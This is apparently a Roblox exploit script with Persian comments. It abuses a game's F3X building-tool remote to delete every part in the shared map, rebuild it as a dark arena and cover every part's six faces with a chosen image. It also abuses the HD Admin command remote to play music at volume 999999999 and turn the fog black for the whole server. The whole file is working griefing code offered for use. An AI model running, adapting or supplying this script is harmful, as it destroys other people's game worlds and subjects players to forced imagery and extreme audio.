local MyTargetID = "122714132204276"
local MusicID = "104181508980428"

local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Player = Players.LocalPlayer

-- پیدا کردن هوشمند ابزار F3X
local tool
for _, v in ipairs(Player:GetDescendants()) do
    if v.Name == "SyncAPI" then tool = v.Parent break end
end
if not tool then
    for _, v in ipairs(game.ReplicatedStorage:GetDescendants()) do
        if v.Name == "SyncAPI" then tool = v.Parent break end
    end
end

if not tool or not tool:FindFirstChild("SyncAPI") then
    warn("ابزار F3X پیدا نشد!")
    return
end

local remote = tool.SyncAPI.ServerEndpoint
local function _(args)
    return remote:InvokeServer(unpack(args))
end

---------------------------------------------------------
-- DEFINED FULL 6-SIDE DECAL SPAM ENGINE ----------------
---------------------------------------------------------
local function RunDecalSpam(id)
    local descendants = workspace:GetDescendants()
    
    local allFaces = {
        Enum.NormalId.Front,
        Enum.NormalId.Back,
        Enum.NormalId.Top,
        Enum.NormalId.Bottom,
        Enum.NormalId.Left,
        Enum.NormalId.Right
    }
    
    for i = 1, #descendants do
        local v = descendants[i]
        if v:IsA("BasePart") and v.Name ~= "CustomSkybox" then
            _({"SetLocked", {v}, false})
            
            task.spawn(function()
                for j = 1, #allFaces do
                    local currentFace = allFaces[j]
                    _({"CreateTextures", {{Part = v, Face = currentFace, TextureType = "Decal"}}})
                    _({"SyncTexture", {{Part = v, Face = currentFace, TextureType = "Decal", Texture = "rbxassetid://" .. id}}})
                end
            end)
        end
    end
end

---------------------------------------------------------
-- SAFE ANTI-VOID FLOW ----------------------------------
---------------------------------------------------------
task.spawn(function()
    local char = Player.Character
    local root = char and char:FindFirstChild("HumanoidRootPart")
    
    -- ۱. فریز کردن کاراکتر روی هوا
    if root then
        _({"SyncAnchor", {{Part = root, Anchored = true}}})
    end
    
    -- ۲. پاکسازی کامل محیط ورک‌پیس
    local items = workspace:GetDescendants()
    for i = 1, #items do
        local v = items[i]
        if v:IsA("BasePart") or v:IsA("UnionOperation") then
            if v ~= root and not v:IsDescendantOf(char) then
                task.spawn(function()
                    _({"Remove", {v}})
                end)
            end
        end
    end
    
    task.wait(0.2)
    
    -- ۳. محاسبات دقیق موقعیت ستاپ مپ
    local spawnPos = root and root.Position or Vector3.new(0, 0, 0)
    local baseCF = CFrame.new(spawnPos.X, spawnPos.Y - 20, spawnPos.Z)
    
    ---------------------------------------------------------
    -- حل باگ: ارتفاع آسمان بدون مشکل تا 1200 واحد بالا می‌رود
    ---------------------------------------------------------
    local skyHeight = 1200
    local skyCF = CFrame.new(spawnPos.X, spawnPos.Y + skyHeight, spawnPos.Z)
    
    local wallFrontCF = baseCF * CFrame.new(0, 70, -80)
    local wallBackCF = baseCF * CFrame.new(0, 70, 80)
    
    -- پخش آنلاین آهنگ و سیاه کردن مه سرور
    local hd = ReplicatedStorage:FindFirstChild("HDAdminHDClient") and ReplicatedStorage.HDAdminHDClient:FindFirstChild("Signals")
    local fireCmd = hd and (hd:FindFirstChild("RequestCommandSilent") or hd:FindFirstChild("RequestCommand"))
    if fireCmd then
        fireCmd:InvokeServer(";music " .. MusicID .. " ;pitch 0.22 ;volume 999999999 ;fogcolor black")
    end

    ---------------------------------------------------------
    -- اصلاح منطق ساخت: ذخیره مستقیم پارت‌ها در متغیرها برای حل باگ عدم شناسایی ارتفاع
    ---------------------------------------------------------
    local cleanBase = _({"CreatePart", "Normal", baseCF, workspace})
    local skyPart = _({"CreatePart", "Normal", skyCF, workspace})
    local w1 = _({"CreatePart", "Normal", wallFrontCF, workspace})
    local w2 = _({"CreatePart", "Normal", wallBackCF, workspace})
    
    -- ساخت دیوارهای قلعه
    local castleWalls = {}
    local r = math.random
    for i = 1, 20 do
        local offsetX = r(-220, 220)
        local offsetZ = r(-220, 220)
        
        if math.abs(offsetX) < 45 and math.abs(offsetZ) < 45 then
            offsetX = offsetX + 65
        end
        
        local castleCF = baseCF * CFrame.new(offsetX, 90, offsetZ)
        local cWall = _({"CreatePart", "Normal", castleCF, workspace})
        if cWall then
            table.insert(castleWalls, {Part = cWall, CF = castleCF})
        end
    end
    
    task.wait(0.05)
    
    -- ۴. کانفیگ سریع بیس‌پلیت
    if cleanBase then
        task.spawn(function()
            _({"SetName", {cleanBase}, "CleanBaseplate"})
            _({"SyncResize", {{Part = cleanBase, CFrame = baseCF, Size = Vector3.new(512, 16, 512)}}})
            _({"SyncMaterial", {{Part = cleanBase, Material = Enum.Material.Concrete}}})
            _({"SyncColor", {{Part = cleanBase, Color = Color3.new(0.2, 0.2, 0.2), UnionColoring = false}}})
            _({"SetLocked", {cleanBase}, false})
            _({"SyncAnchor", {{Part = cleanBase, Anchored = true}}})
        end)
    end
    
    -- دیوارهای جلو و عقب فوق‌العاده عریض و بلند
    local walls = {w1, w2}
    local wallCFs = {wallFrontCF, wallBackCF}
    for i = 1, #walls do
        local wall = walls[i]
        if wall then
            task.spawn(function()
                _({"SetName", {wall}, "NearWall_" .. i})
                _({"SyncResize", {{Part = wall, CFrame = wallCFs[i], Size = Vector3.new(150, 160, 4)}}})
                _({"SyncMaterial", {{Part = wall, Material = Enum.Material.Concrete}}})
                _({"SyncColor", {{Part = wall, Color = Color3.new(0.2, 0.2, 0.2), UnionColoring = false}}})
                _({"SyncAnchor", {{Part = wall, Anchored = true}}})
            end)
        end
    end
    
    -- ضخامت دیوارهای قلعه
    for i = 1, #castleWalls do
        local wallData = castleWalls[i]
        if wallData.Part then
            task.spawn(function()
                _({"SetName", {wallData.Part}, "CastlePillar_" .. i})
                _({"SyncResize", {{Part = wallData.Part, CFrame = wallData.CF, Size = Vector3.new(r(15, 35), 180, 12)}}})
                _({"SyncMaterial", {{Part = wallData.Part, Material = Enum.Material.Concrete}}})
                _({"SyncColor", {{Part = wallData.Part, Color = Color3.new(0.15, 0.15, 0.15), UnionColoring = false}}})
                _({"SyncAnchor", {{Part = wallData.Part, Anchored = true}}})
            end)
        end
    end
    
    if skyPart then
        task.spawn(function()
            _({"SetName", {skyPart}, "CustomSkybox"})
            _({"CreateMeshes", {{Part = skyPart}}})
            ---------------------------------------------------------
            -- اسکیل به شدت عمودی (32000) برای اینکه کل کشیدگی تا ته عکس روی زمین معلوم باشد
            ---------------------------------------------------------
            _({"SyncMesh", {{Part = skyPart, MeshId = "rbxassetid://111891702759441", TextureId = "rbxassetid://" .. MyTargetID, Scale = Vector3.new(25000, 32000, 25000)}}})
            _({"SetLocked", {skyPart}, true})
            _({"SyncCollision", {{Part = skyPart, CanCollide = false}}})
            _({"SyncAnchor", {{Part = skyPart, Anchored = true}}})
        end)
    end
    
    -- ۵. پایداری و آن‌فریز شدن کاراکتر روی مپ جدید
    repeat task.wait(0.05) until workspace:FindFirstChild("CleanBaseplate")
    task.wait(0.1)
    
    if root then
        _({"SyncAnchor", {{Part = root, Anchored = false}}})
    end
    
    task.wait(0.001)
    
    -- ۷. اجرای دکال اسپم ۱۰۰ درصدی روی کل پارت‌ها
    RunDecalSpam(MyTargetID)
    
    -- قفل کردن نهایی آبجکت‌ها
    if cleanBase then _({"SetLocked", {cleanBase}, true}) end
    for i = 1, #walls do if walls[i] then _({"SetLocked", {walls[i]}, true}) end end
    for i = 1, #castleWalls do if castleWalls[i].Part then _({"SetLocked", {castleWalls[i].Part}, true}) end end
end)
